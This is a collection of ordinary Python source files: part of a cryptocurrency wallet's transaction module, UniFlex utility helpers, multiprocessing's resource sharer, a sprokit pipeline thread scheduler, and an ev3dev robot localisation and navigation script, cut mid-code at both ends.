if len(inps) == len(self._inputs) and eph.get('_fetch') == t: # sanity check
eph.pop('_fetch', None) # potential race condition here, popping wrong t -- but in practice w/ CPython threading it won't matter
print_error("fetch_input_data: elapsed {} sec".format(time.time()-t0))
if done_callback:
done_callback(*done_args)
# /doIt
t = threading.Thread(target=doIt, daemon=True)
eph['_fetch'] = t
t.start()
return True
def fetched_inputs(self, *, require_complete=False):
''' Returns the complete list of asynchronously fetched inputs for
this tx, if they exist. If the list is not yet fully retrieved, and
require_complete == False, returns what it has so far
(the returned list will always be exactly equal to len(self._inputs),
with not-yet downloaded inputs coming from self._inputs and not
necessarily containing a good 'address' or 'value').
If the download failed completely or was never started, will return the
empty list [].
Note that some inputs may still lack the 'value' key if there was a network
error in retrieving them or if the download is still in progress.'''
if self._inputs:
ret = self.ephemeral.get('fetched_inputs') or []
diff = len(self._inputs) - len(ret)
if diff > 0 and self.ephemeral.get('_fetch') and not require_complete:
# in progress.. so return what we have so far
return ret + self._inputs[len(ret):]
elif diff == 0 and (not require_complete or not self.ephemeral.get('_fetch')):
# finished *or* in-progress and require_complete==False
return ret
return []
def fetch_cancel(self) -> bool:
''' Cancels the currently-active running fetch operation, if any '''
return bool(self.ephemeral.pop('_fetch', None))
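# Rough usage sketch of the asynchronous fetch API above. The exact signature
# of fetch_input_data is an assumption inferred from the names it references
# (wallet, done_callback, prog_callback, use_network):
#
#   tx.fetch_input_data(wallet, done_callback=on_done)  # starts the worker thread
#   partial = tx.fetched_inputs()                        # partial results while running
#   tx.fetch_cancel()                                    # abort, if still in flight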
@classmethod
def tx_cache_get(cls, txid : str) -> object:
''' Attempts to retrieve txid from the tx cache that this class
keeps in-memory. Returns None on failure. The returned tx is
not deserialized, and is a copy of the one in the cache. '''
tx = cls._fetched_tx_cache.get(txid)
if tx is not None and tx.raw:
# Make sure to return a copy of the transaction from the cache, so that if
# the caller calls .deserialize(), it is the caller's copy that pays the
# (roughly 10x) memory cost of deserialization, and not the cached instance,
# which should remain an undeserialized raw tx.
return Transaction(tx.raw)
return None
@classmethod
def tx_cache_put(cls, tx : object, txid : str = None):
''' Puts a non-deserialized copy of tx into the tx_cache. '''
if not tx or not tx.raw:
raise ValueError('Please pass a tx which has a valid .raw attribute!')
txid = txid or cls._txid(tx.raw) # optionally, caller can pass-in txid to save CPU time for hashing
cls._fetched_tx_cache.put(txid, Transaction(tx.raw))
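# Illustrative cache round-trip (a sketch; `raw_hex` is a hypothetical valid
# serialized transaction in hex):
#
#   tx = Transaction(raw_hex)
#   Transaction.tx_cache_put(tx)                           # stores an undeserialized copy
#   cached = Transaction.tx_cache_get(Transaction._txid(tx.raw))
#   assert cached is not tx                                # always a fresh copy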
def tx_from_str(txt):
"json or raw hexadecimal"
import json
txt = txt.strip()
if not txt:
raise ValueError("empty string")
try:
bfh(txt)
is_hex = True
except Exception:
is_hex = False
if is_hex:
return txt
tx_dict = json.loads(str(txt))
assert "hex" in tx_dict.keys()
return tx_dict["hex"]
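# Examples of the two input forms accepted by tx_from_str (hex elided for brevity):
#
#   tx_from_str("0100000001...")                # raw hex is returned unchanged
#   tx_from_str('{"hex": "0100000001..."}')     # JSON: the value of "hex" is returned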
|
common.py
|
import inspect
import threading
import netifaces as ni
from netifaces import AF_INET
__author__ = "Piotr Gawlowicz, Anatolij Zubow"
__copyright__ = "Copyright (c) 2015, Technische Universitat Berlin"
__version__ = "0.1.0"
__email__ = "{gawlowicz|zubow}@tkn.tu-berlin.de"
def override():
'''
Decorator marking that a method is intended to override one defined in a
base class (the runtime assertion below is currently disabled).
'''
def overrider(method):
# myClass = method.__self__.__class__
# interface_class = myClass.__mro__[1]
# assert(method.__name__ in dir(interface_class))
return method
return overrider
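# Illustrative usage of the decorator (the runtime check is currently a no-op;
# the class names below are hypothetical):
#
#   class MyModule(SomeBaseClass):
#       @override()
#       def my_method(self):
#           ...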
def is_func_implemented(func):
code = inspect.getsourcelines(func)
lines = code[0]
lastLine = lines[-1]
if "NotImplementedError" in lastLine:
return False
else:
return True
def get_inheritors(klass):
subclasses = {}
work = [klass]
while work:
parent = work.pop()
for child in parent.__subclasses__():
if child not in subclasses:
subclasses[str(child.__name__)] = child
work.append(child)
return subclasses
def get_inheritors_set(klass):
subclasses = set()
work = [klass]
while work:
parent = work.pop()
for child in parent.__subclasses__():
if child not in subclasses:
subclasses.add(child)
work.append(child)
return subclasses
def get_ip_address(ifname):
try:
# AZU: old code was for Linux only; does not work with OSX
# new solution is platform independent
val = ni.ifaddresses(ifname)[AF_INET][0]['addr']
return val
except Exception as e:
print("Failed to get IP address of iface: {} {}".format(ifname, e))
raise e
class UniFlexThread():
"""docstring for UniFlexThread"""
def __init__(self, module):
super().__init__()
self.module = module
self.running = False
def start(self):
self.running = True
self.thread = threading.Thread(target=self.task)
self.thread.daemon = True
self.thread.start()
def task(self):
return
def stop(self):
self.running = False
def is_running(self):
return self.running
def is_stopped(self):
return not self.running
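# Minimal sketch of how UniFlexThread is meant to be subclassed; task() should
# poll self.running (or is_running()) so that stop() takes effect. The names
# below are hypothetical:
#
#   class Heartbeat(UniFlexThread):
#       def task(self):
#           while self.is_running():
#               self.module.send_heartbeat()  # hypothetical module method
#
#   Heartbeat(module).start()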
|
resource_sharer.py
|
#
# We use a background thread for sharing fds on Unix, and for sharing sockets on
# Windows.
#
# A client which wants to pickle a resource registers it with the resource
# sharer and gets an identifier in return. The unpickling process connects
# to the resource sharer, sends the identifier and its pid, and then receives
# the resource.
#
import os
import signal
import socket
import sys
import threading
from . import process
from .context import reduction
from . import util
__all__ = ['stop']
if sys.platform == 'win32':
__all__ += ['DupSocket']
class DupSocket(object):
'''Picklable wrapper for a socket.'''
def __init__(self, sock):
new_sock = sock.dup()
def send(conn, pid):
share = new_sock.share(pid)
conn.send_bytes(share)
self._id = _resource_sharer.register(send, new_sock.close)
def detach(self):
'''Get the socket. This should only be called once.'''
with _resource_sharer.get_connection(self._id) as conn:
share = conn.recv_bytes()
return socket.fromshare(share)
else:
__all__ += ['DupFd']
class DupFd(object):
'''Wrapper for fd which can be used at any time.'''
def __init__(self, fd):
new_fd = os.dup(fd)
def send(conn, pid):
reduction.send_handle(conn, new_fd, pid)
def close():
os.close(new_fd)
self._id = _resource_sharer.register(send, close)
def detach(self):
'''Get the fd. This should only be called once.'''
with _resource_sharer.get_connection(self._id) as conn:
return reduction.recv_handle(conn)
class _ResourceSharer(object):
'''Manager for resources using a background thread.'''
def __init__(self):
self._key = 0
self._cache = {}
self._old_locks = []
self._lock = threading.Lock()
self._listener = None
self._address = None
self._thread = None
util.register_after_fork(self, _ResourceSharer._afterfork)
def register(self, send, close):
'''Register resource, returning an identifier.'''
with self._lock:
if self._address is None:
self._start()
self._key += 1
self._cache[self._key] = (send, close)
return (self._address, self._key)
@staticmethod
def get_connection(ident):
'''Return connection from which to receive identified resource.'''
from .connection import Client
address, key = ident
c = Client(address, authkey=process.current_process().authkey)
c.send((key, os.getpid()))
return c
def stop(self, timeout=None):
'''Stop the background thread and clear registered resources.'''
from .connection import Client
with self._lock:
if self._address is not None:
c = Client(self._address,
authkey=process.current_process().authkey)
c.send(None)
c.close()
self._thread.join(timeout)
if self._thread.is_alive():
util.sub_warning('_ResourceSharer thread did '
'not stop when asked')
self._listener.close()
self._thread = None
self._address = None
self._listener = None
for key, (send, close) in self._cache.items():
close()
self._cache.clear()
def _afterfork(self):
for key, (send, close) in self._cache.items():
close()
self._cache.clear()
# If self._lock was locked at the time of the fork, it may be broken
# -- see issue 6721. Replace it without letting it be gc'ed.
self._old_locks.append(self._lock)
self._lock = threading.Lock()
if self._listener is not None:
self._listener.close()
self._listener = None
self._address = None
self._thread = None
def _start(self):
from .connection import Listener
assert self._listener is None
util.debug('starting listener and thread for sending handles')
self._listener = Listener(authkey=process.current_process().authkey)
self._address = self._listener.address
t = threading.Thread(target=self._serve)
t.daemon = True
t.start()
self._thread = t
def _serve(self):
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, range(1, signal.NSIG))
while 1:
try:
with self._listener.accept() as conn:
msg = conn.recv()
if msg is None:
break
key, destination_pid = msg
send, close = self._cache.pop(key)
try:
send(conn, destination_pid)
finally:
close()
except:
if not util.is_exiting():
sys.excepthook(*sys.exc_info())
_resource_sharer = _ResourceSharer()
stop = _resource_sharer.stop
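# Rough outline of the Unix fd-sharing flow implemented above (conceptual):
#
#   1. The sender wraps a descriptor: dup = DupFd(fd); register() stores a
#      (send, close) pair and returns (address, key), kept in dup._id.
#   2. Only that small identifier travels to the receiving process (e.g.
#      inside a pickled object).
#   3. The receiver calls dup.detach(), which connects to the listener started
#      by _start(), sends (key, pid), and gets the real fd back via
#      reduction.recv_handle().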
|
pythread_per_process_scheduler.py
|
#ckwg +28
# Copyright 2012 by Kitware, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither name of Kitware, Inc. nor the names of any contributors may be used
# to endorse or promote products derived from this software without specific
# prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS''
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from sprokit.pipeline import config
from sprokit.pipeline import datum
from sprokit.pipeline import edge
from sprokit.pipeline import pipeline
from sprokit.pipeline import process
from sprokit.pipeline import scheduler
from sprokit.pipeline import utils
import threading
class UnsupportedProcess(Exception):
def __init__(self, name):
self.name = name
def __str__(self):
fmt = "The process '%s' does not support running in a Python thread"
return (fmt % self.name)
class PyThreadPerProcessScheduler(scheduler.PythonScheduler):
""" Runs each process in a pipeline in its own thread.
"""
def __init__(self, pipe, conf):
scheduler.PythonScheduler.__init__(self, pipe, conf)
p = self.pipeline()
names = p.process_names()
no_threads = process.PythonProcess.property_no_threads
for name in names:
proc = p.process_by_name(name)
properties = proc.properties()
if no_threads in properties:
raise UnsupportedProcess(name)
self._threads = []
self._pause_event = threading.Event()
self._event = threading.Event()
self._make_monitor_edge_config()
def _start(self):
p = self.pipeline()
names = p.process_names()
for name in names:
proc = p.process_by_name(name)
thread = threading.Thread(target=self._run_process, name=name, args=(proc,))
self._threads.append(thread)
for thread in self._threads:
thread.start()
def _wait(self):
for thread in self._threads:
thread.join()
def _pause(self):
self._pause_event.set()
def _resume(self):
self._pause_event.clear()
def _stop(self):
self._event.set()
def _run_process(self, proc):
utils.name_thread(proc.name())
monitor = edge.Edge(self._edge_conf)
proc.connect_output_port(process.PythonProcess.port_heartbeat, monitor)
complete = False
while not complete and not self._event.is_set():
while self._pause_event.is_set():
self._pause_event.wait()
proc.step()
while monitor.has_data():
edat = monitor.get_datum()
dat = edat.datum
if dat.type() == datum.DatumType.complete:
complete = True
def _make_monitor_edge_config(self):
self._edge_conf = config.empty_config()
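# Illustrative use of the scheduler (a sketch; assumes the scheduler base class
# exposes public start()/wait() wrappers around the _start()/_wait() hooks
# implemented above, and that `pipe` is an already-built sprokit pipeline):
#
#   conf = config.empty_config()
#   sched = PyThreadPerProcessScheduler(pipe, conf)
#   sched.start()
#   sched.wait()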
|
robot.py
|
#!/usr/bin/env python3
from ev3dev2.motor import Motor, SpeedRPS, MoveTank
from ev3dev2.sensor.lego import ColorSensor, UltrasonicSensor
from ev3dev2.power import PowerSupply
from math import pi, sin, cos, atan, atan2, tan, sqrt
from threading import Thread
import numpy as np
from time import sleep, time
from ev3dev2.sensor import INPUT_1, INPUT_4
from ev3dev2.stopwatch import StopWatch
from ev3dev2.sound import Sound
sound = Sound()
class sensores_y_bateria:
def __init__(self, sonar, sensor_color):
self.sonar = UltrasonicSensor(sonar)
self.s_color = ColorSensor(sensor_color)
self.bateria = PowerSupply()
# Ultrasonic sensor
@property
def distancia_sonar(self):
return (self.sonar.distance_centimeters / 100)
@property
def otros_sensores_presentes(self):
return self.sonar.other_sensor_present
# Color sensor
def calibrar_blanco(self):
self.s_color.calibrate_white()
@property
def color(self):
return self.s_color.color
@property
def nombre_color(self):
return self.s_color.color_name
@property
def ambiente(self):
return self.s_color.ambient_light_intensity
@property
def reflexion(self):
return self.s_color.reflected_light_intensity
@property
def rgb(self):
return self.s_color.rgb
# Battery
@property
def voltaje_bateria(self):
return self.bateria.measured_volts
@property
def corriente_bateria(self):
return self.bateria.measured_amps
class motores:
def __init__(self, motor_izquierdo, motor_derecho, radio_rueda, separacion_ruedas):
self.motor_izquierdo = Motor(motor_izquierdo)
self.motor_derecho = Motor(motor_derecho)
self.dos_motores = MoveTank(motor_izquierdo, motor_derecho)
self.radio = radio_rueda
self.sruedas = separacion_ruedas
def SpeedRadPS(self, value):
return SpeedRPS(value/(2*pi))
# Individual motors
@property
def w_motor_derecho(self):
return 2*pi*(self.motor_derecho.speed/self.motor_derecho.count_per_rot)
@w_motor_derecho.setter
def w_motor_derecho(self, velocidad):
self.motor_derecho.on(self.SpeedRadPS(velocidad))
@property
def w_motor_izquierdo(self):
return 2*pi*(self.motor_izquierdo.speed/self.motor_izquierdo.count_per_rot)
@w_motor_izquierdo.setter
def w_motor_izquierdo(self, velocidad):
self.motor_izquierdo.on(self.SpeedRadPS(velocidad))
@property
def dc_motor_izquierdo(self):
return self.motor_izquierdo.duty_cycle
@dc_motor_izquierdo.setter
def dc_motor_izquierdo(self, ciclo):
self.motor_izquierdo.run_direct(duty_cycle_sp = ciclo)
@property
def dc_motor_derecho(self):
return self.motor_derecho.duty_cycle
@dc_motor_derecho.setter
def dc_motor_derecho(self, ciclo):
self.motor_derecho.run_direct(duty_cycle_sp = ciclo)
@property
def posicion_motor_derecho(self):
return self.motor_derecho.position * pi / 180
@property
def posicion_motor_izquierdo(self):
return self.motor_izquierdo.position * pi / 180
# Both motors
def correr(self, linear, angular):
derecha = (linear + ((angular * self.sruedas) / 2)) / self.radio
izquierda = (linear - ((angular * self.sruedas) / 2)) / self.radio
self.dos_motores.on(self.SpeedRadPS(izquierda), self.SpeedRadPS(derecha))
def correr_tiempo(self, linear, angular, tiempo, bloqueo):
derecha = ((linear) + ((angular*self.sruedas) / 2)) / self.radio
izquierda = ((linear) - ((angular * self.sruedas) / 2)) / self.radio
self.dos_motores.on_for_seconds(self.SpeedRadPS(izquierda), self.SpeedRadPS(derecha), tiempo, block = bloqueo)
def parar(self):
self.dos_motores.off()
@property
def velocidad_linear(self):
return ((self.w_motor_derecho+self.w_motor_izquierdo)/2)*self.radio
@property
def velocidad_angular(self):
return ((self.w_motor_derecho-self.w_motor_izquierdo)*self.radio)/self.sruedas
class localizacion(motores):
def __init__(self, motor_izquierdo, motor_derecho, radio_rueda, separacion_ruedas, posicion, loc_sonar, loc_sensor_color):
motores.__init__(self, motor_izquierdo, motor_derecho, radio_rueda, separacion_ruedas)
self.s = sensores_y_bateria(sonar = loc_sonar, sensor_color = loc_sensor_color)
self.posicion_robot = posicion
# Odometry
self.izquierda_anterior = self.posicion_motor_izquierdo
self.derecha_anterior = self.posicion_motor_derecho
self.tiempo_anterior = time()
# Probabilistic localization
self.margen_inicial_x_y = 0.05
self.margen_inicial_angulo = 0.573
self.muk = np.array([[self.posicion_robot[0][0]],
[self.posicion_robot[1][0]],
[self.posicion_robot[3][0]]])
self.sigmak = np.array([[(self.margen_inicial_x_y/4)**2, 0.0, 0.0],
[0.0, (self.margen_inicial_x_y/4)**2, 0.0],
[0.0, 0.0, (self.margen_inicial_angulo/4)**2]])
def cutwithwall(self, xk, yk, pk, xp1, yp1, xp2, yp2):
xc = 0
yc = 0
dyp = yp2-yp1
dxp = xp2-xp1
denxc = dyp-dxp*tan(pk)
if denxc == 0:
thereis=0
return thereis, xc, yc
num = dyp*(xk-xp1)+dxp*(yp1-yk)
xc = xk-num/denxc
denyc = dxp-dyp*(1/tan(pk))
if denyc == 0:
thereis=0
return thereis, xc, yc
yc=yk+num/denyc
u = np.array([xc-xk, yc-yk])
r = np.array([cos(pk), sin(pk)])
if (u[0]*r[0]+u[1]*r[1]) < 0:
thereis=0
return thereis, xc, yc
u = np.array([xp2-xp1, yp2-yp1])
c = np.array([xc-xp1, yc-yp1])
mu = sqrt((u[0]**2)+(u[1]**2))
mc = sqrt((c[0]**2)+(c[1]**2))
if (u[0]*c[0]+u[1]*c[1]) < 0:
thereis=0
return thereis, xc, yc
if mc > mu:
thereis=0
return thereis, xc, yc
thereis=1
return thereis, xc, yc
def planeposesonar(self, Ts2u):
originsonar = Ts2u @ np.array([[0], [0], [0], [1]])
endingsonar = Ts2u @ np.array([[1], [0], [0], [1]])
posesonar = [originsonar[0][0], originsonar[1][0], atan2(endingsonar[1][0]-originsonar[1][0], endingsonar[0][0]-originsonar[0][0])]
return posesonar
def raycasting(self, mapa, poser, Ts2u):
posesonar = self.planeposesonar(Ts2u)
nps = len(mapa)
cuts = []
for f in range(0, nps):
thereis0, xc0, yc0 = self.cutwithwall(posesonar[0], posesonar[1], posesonar[2], mapa[f][0], mapa[f][1], mapa[f][2], mapa[f][3])
if thereis0 == 1:
d0 = sqrt(((xc0-posesonar[0])**2)+((yc0-posesonar[1])**2))
cuts.append([f, xc0, yc0, d0])
if cuts == []:
indwall = -1
xc = 0
yc = 0
dc = 0
drc = 0
return indwall, xc, yc, dc, drc
aux = [row[3] for row in cuts]
minc = min(aux)
iminc = aux.index(minc)
indwall = cuts[iminc][0]
xc = cuts[iminc][1]
yc = cuts[iminc][2]
dc = cuts[iminc][3]
drc = sqrt(((xc-poser[0])**2)+(yc-poser[1])**2)
return indwall, xc, yc, dc, drc
def eq3(self, mapa, muk_pred, Ts2u):
calculationsok = 0
Hk = np.array([[0.0, 0.0, 0.0]])
ok = 0
indwall, xc, yc, mu_zk, drc = self.raycasting(mapa, muk_pred, Ts2u)
if indwall == -1:
return calculationsok, Hk, mu_zk
xp1 = mapa[indwall][0]
yp1 = mapa[indwall][1]
xp2 = mapa[indwall][2]
yp2 = mapa[indwall][3]
posesonar = self.planeposesonar(Ts2u)
senbeta = yp2-yp1
cosbeta = xp2-xp1
sentheta = sin(posesonar[2])
costheta = cos(posesonar[2])
if ((senbeta == 0) and (sentheta == 0)) or ((cosbeta == 0) and (costheta == 0)):
return calculationsok, Hk, mu_zk
if (cosbeta != 0) and (costheta != 0):
if (senbeta/cosbeta == sentheta/costheta):
return calculationsok, Hk, mu_zk
if (cosbeta != 0):
tanbeta = senbeta/cosbeta
den = sentheta-costheta*tanbeta
Hk[0][0] = tanbeta/den
Hk[0][1] = -1/den
Hk[0][2] = -(-(posesonar[1]-yp1)+(posesonar[0]-xp1)*tanbeta)*(costheta+sentheta*tanbeta)/(den**2)
else:
cotbeta = cosbeta/senbeta
den = costheta-sentheta*cotbeta
Hk[0][0] = -1/den
Hk[0][1] = cotbeta/den
Hk[0][2] = -(-(posesonar[0]-xp1)+(posesonar[1]-yp1)*cotbeta)*(-sentheta+costheta*cotbeta)/(den**2)
calculationsok = 1
return calculationsok, Hk, mu_zk
def coordenadas_robot_a_global(self, posicion):
T = np.array([[cos(posicion[2][0]), -sin(posicion[2][0]), 0.0, posicion[0][0]],
[sin(posicion[2][0]), cos(posicion[2][0]), 0.0, posicion[1][0]],
[0.0, 0.0, 1.0, 0.0],
[0.0, 0.0, 0.0, 1.0]])
return T
def odometria(self, modo):
izquierda_actual = self.posicion_motor_izquierdo
derecha_actual = self.posicion_motor_derecho
tiempo_actual = time()
rotacion_izquierda = izquierda_actual - self.izquierda_anterior
rotacion_derecha = derecha_actual - self.derecha_anterior
h = tiempo_actual - self.tiempo_anterior
self.izquierda_anterior = izquierda_actual
self.derecha_anterior = derecha_actual
self.tiempo_anterior = tiempo_actual
distancia_izquierda = rotacion_izquierda * self.radio
distancia_derecha = rotacion_derecha * self.radio
distancia_total = (distancia_izquierda + distancia_derecha) / 2.0
rotacion_total = (distancia_derecha - distancia_izquierda) / self.sruedas
if (modo == "euler"): #Euler
self.posicion_robot[0] += distancia_total * cos(self.posicion_robot[3][0])
self.posicion_robot[1] += distancia_total * sin(self.posicion_robot[3][0])
self.posicion_robot[3] += rotacion_total
return self.posicion_robot
elif (modo == "RK2"): #Runge-Kutta de segundo orden
self.posicion_robot[0] += distancia_total * cos(self.posicion_robot[3][0] + (rotacion_total / 2))
self.posicion_robot[1] += distancia_total * sin(self.posicion_robot[3][0] + (rotacion_total / 2))
self.posicion_robot[3] += rotacion_total
return self.posicion_robot
elif (modo == "RK4"): #Runge-Kutta de cuarto orden
theta05 = self.posicion_robot[3][0] + (rotacion_total / 2)
theta1 = self.posicion_robot[3][0] + rotacion_total
self.posicion_robot[0] += distancia_total * (1/6) * (cos(self.posicion_robot[3][0]) + 4 * cos(theta05) + cos(theta1))
self.posicion_robot[1] += distancia_total * (1/6) * (sin(self.posicion_robot[3][0]) + 4 * sin(theta05) + sin(theta1))
self.posicion_robot[3] += rotacion_total
return self.posicion_robot
elif (modo == "Exacto"): #Exacto
v = distancia_total / h
w = rotacion_total / h
theta1 = self.posicion_robot[3][0] + rotacion_total
if w:
self.posicion_robot[0] += (v / w) * (sin(theta1) - sin(self.posicion_robot[3][0]))
self.posicion_robot[1] -= (v / w) * (cos(theta1) - cos(self.posicion_robot[3][0]))
self.posicion_robot[3] += rotacion_total
else:
self.posicion_robot[0] += (distancia_total * cos(self.posicion_robot[3][0]))
self.posicion_robot[1] += (distancia_total * sin(self.posicion_robot[3][0]))
self.posicion_robot[3] += rotacion_total
return self.posicion_robot
elif (modo == "Prob"): #Uso en localización probabilistica
muk_pred = np.array([[self.muk[0][0] + (distancia_total * cos(self.muk[2][0]))],
[self.muk[1][0] + (distancia_total * sin(self.muk[2][0]))],
[self.muk[2][0] + rotacion_total]])
G = np.array([[1.0, 0.0, -distancia_total * sin(self.muk[2][0])],
[0.0, 1.0, distancia_total * cos(self.muk[2][0])],
[0.0, 0.0, 1.0]])
self.posicion_robot[0] += distancia_total * cos(self.posicion_robot[3][0])
self.posicion_robot[1] += distancia_total * sin(self.posicion_robot[3][0])
self.posicion_robot[3] += rotacion_total
return muk_pred, G
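# Differential-drive odometry in brief: with wheel radius R (self.radio) and
# wheel separation L (self.sruedas), the per-step displacement and rotation are
#   d      = R * (dphi_left + dphi_right) / 2
#   dtheta = R * (dphi_right - dphi_left) / L
# and the Euler pose update is x += d*cos(theta), y += d*sin(theta),
# theta += dtheta. The RK2/RK4/exact branches above differ only in which
# heading value is used across the step.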
def localizacion_probabilistica(self, mapa, rox, roy, rotheta, Rk):
muk_pred, G = self.odometria("Prob")
Q = np.array([[(rox*(muk_pred[0][0]-self.muk[0][0]))**2, 0.0, 0.0],
[0.0, (roy*(muk_pred[1][0]-self.muk[1][0]))**2, 0.0],
[0.0, 0.0, (rotheta*(muk_pred[2][0]-self.muk[2][0]))**2]])
sigmak_pred = G @ self.sigmak @ G.T + Q
offsx = -0.059
offsy = -0.0235
offsphi = pi/2
rTs = np.array([[cos(offsphi), -sin(offsphi), 0, offsx],
[sin(offsphi), cos(offsphi), 0, offsy],
[0, 0, 1, 0],
[0, 0, 0, 1]])
uTr = self.coordenadas_robot_a_global(muk_pred)
uTs = uTr @ rTs
calculationsok, Hk, mu_zk = self.eq3(mapa, muk_pred, uTs)
distancia = self.s.distancia_sonar
if calculationsok:
sigma_zk = Hk[0] @ sigmak_pred @ Hk.T + Rk
sigmapok_pred = sigmak_pred @ Hk.T
Kk = sigmapok_pred * (1/sigma_zk)
self.muk = muk_pred + Kk * (distancia - mu_zk)
self.sigmak = sigmak_pred - Kk @ (Hk @ sigmak_pred)
else:
self.muk = muk_pred
self.sigmak = sigmak_pred
return self.muk, self.sigmak
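# The update above is a standard EKF step with a scalar sonar measurement:
#   K     = sigma_pred @ H.T / (H @ sigma_pred @ H.T + Rk)
#   mu    = mu_pred + K * (z - z_pred)
#   sigma = sigma_pred - K @ H @ sigma_pred
# where z is the measured sonar distance and z_pred (mu_zk) comes from
# ray-casting the predicted sonar pose against the map.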
class navegacion(localizacion):
def __init__(self, motor_izquierdo, motor_derecho, radio_rueda, separacion_ruedas, posicion, nav_sonar, nav_sensor_color):
localizacion.__init__(self, motor_izquierdo, motor_derecho, radio_rueda, separacion_ruedas, posicion, nav_sonar, nav_sensor_color)
# Log file
self.f = None
self.escribir_fichero_activo = False
self.fin_escribir_fichero = True
self.t = StopWatch()
def coordenadas_global_a_robot(self, robot, punto_global):
R = np.array([[cos(robot[3][0]), -sin(robot[3][0]), 0.0],
[sin(robot[3][0]), cos(robot[3][0]), 0.0],
[0.0, 0.0, 1.0]])
Rt = R.transpose()
aux = -(Rt @ robot[:3])
T = np.array([[Rt[0][0], Rt[0][1], Rt[0][2], aux[0][0]],
[Rt[1][0], Rt[1][1], Rt[1][2], aux[1][0]],
[Rt[2][0], Rt[2][1], Rt[2][2], aux[2][0]],
[0, 0, 0, 1]])
p = np.array([[punto_global[0][0]], [punto_global[1][0]], [punto_global[2][0]], [1]])
resultado = T @ p
return resultado[:3]
def navegacion_planificada(self, puntos_objetivos, KW):
vector_hasta_destino = np.array([0.0, 0.0, 0.0])
for punto in puntos_objetivos:
while 1:
robot = self.odometria("RK4")
vector_hasta_destino[0] = punto[0] - robot[0][0]
vector_hasta_destino[1] = punto[1] - robot[1][0]
vector_hasta_destino[2] = punto[2] - robot[2][0]
modulo = sqrt(vector_hasta_destino @ vector_hasta_destino.T)
if (modulo <= 0.05):
sound.beep()
break
angulo_objetivo = atan2(vector_hasta_destino[1], vector_hasta_destino[0])
if angulo_objetivo < 0:
angulo_objetivo = angulo_objetivo + 2 * pi
angulo_robot = robot[3][0]
while angulo_robot > 2*pi:
angulo_robot = angulo_robot - 2 * pi
while angulo_robot < 0:
angulo_robot = angulo_robot + 2 * pi
angulo = angulo_objetivo - angulo_robot
if angulo < -pi:
angulo = angulo + 2 * pi
if angulo > pi:
angulo = -(2 * pi - angulo)
w = KW * angulo
if w > pi:
w = pi
if w < -pi:
w = -pi
self.correr(0.2, w)
self.parar()
def navegacion_reactiva_campos_virtuales(self, objetivo, rTs, KA, KR):
vector_resultante = np.array([0.0, 0.0, 0.0])
while 1:
vector_hasta_destino = self.coordenadas_global_a_robot(self.odometria("RK4"), objetivo)
vector_de_repulsion = np.array([[0.0], [0.0], [0.0]])
modulo = sqrt(vector_hasta_destino[0].T @ vector_hasta_destino[0])
if (modulo <= 0.05):
break
obstaculo = rTs @ np.array([[self.s.distancia_sonar], [0.0], [0.0], [1.0]])
modulo = sqrt(obstaculo[:3][0].T @ obstaculo[:3][0])
if modulo > 0.45:
vector_de_repulsion[0][0] = 0.0
vector_de_repulsion[1][0] = 0.0
vector_de_repulsion[2][0] = 0.0
else:
vector_de_repulsion= ((0.45 - modulo) / 0.45) * obstaculo
vector_resultante[0] = KA * vector_hasta_destino[0][0] - KR * vector_de_repulsion[0][0]
vector_resultante[1] = KA * vector_hasta_destino[1][0] - KR * vector_de_repulsion[1][0]
vector_resultante[2] = KA * vector_hasta_destino[2][0] - KR * vector_de_repulsion[2][0]
v = 0.2 * vector_resultante[0]
w = 2 * vector_resultante[1]
if(v > 0.2):
v = 0.2
if(v < -0.2):
v = -0.2
if(w > pi):
w = pi
if(w < -pi):
w = -pi
self.correr(v, w)
self.parar()
# Data logging
def empezar_fichero(self, nombre_fichero, tiempo, *args, **kwargs):
def hilo_fichero():
self.t.start()
while self.escribir_fichero_activo:
for l in args:
if l == "tiempo":
self.f.write(str(self.t.value_ms/1000)+" ")
elif l == "distancia_sonar":
self.f.write(str(self.s.distancia_sonar)+" ")
elif l == "otros_sensores_presentes":
self.f.write(str(self.s.otros_sensores_presentes)+" ")
elif l == "color":
self.f.write(str(self.s.color)+" ")
elif l == "nombre_color":
self.f.write(str(self.s.nombre_color)+" ")
elif l == "ambiente":
self.f.write(str(self.s.ambiente)+" ")
elif l == "reflexion":
self.f.write(str(self.s.reflexion)+" ")
elif l == "rgb":
self.f.write(str(self.s.rgb)+" ")
elif l == "voltaje_bateria":
self.f.write(str(self.s.voltaje_bateria)+" ")
elif l == "corriente_bateria":
self.f.write(str(self.s.corriente_bateria)+" ")
elif l == "w_motor_derecho":
self.f.write(str(self.w_motor_derecho)+" ")
elif l == "w_motor_izquierdo":
self.f.write(str(self.w_motor_izquierdo)+" ")
elif l == "dc_motor_izquierdo":
self.f.write(str(self.dc_motor_izquierdo)+" ")
elif l == "dc_motor_derecho":
self.f.write(str(self.dc_motor_derecho)+" ")
elif l == "posicion_motor_derecho":
self.f.write(str(self.posicion_motor_derecho)+" ")
elif l == "velocidad_linear":
self.f.write(str(self.velocidad_linear)+" ")
elif l == "velocidad_angular":
self.f.write(str(self.velocidad_angular)+" ")
elif l == "odometria":
if "modo" in kwargs:
posicion = self.odometria(kwargs["modo"])
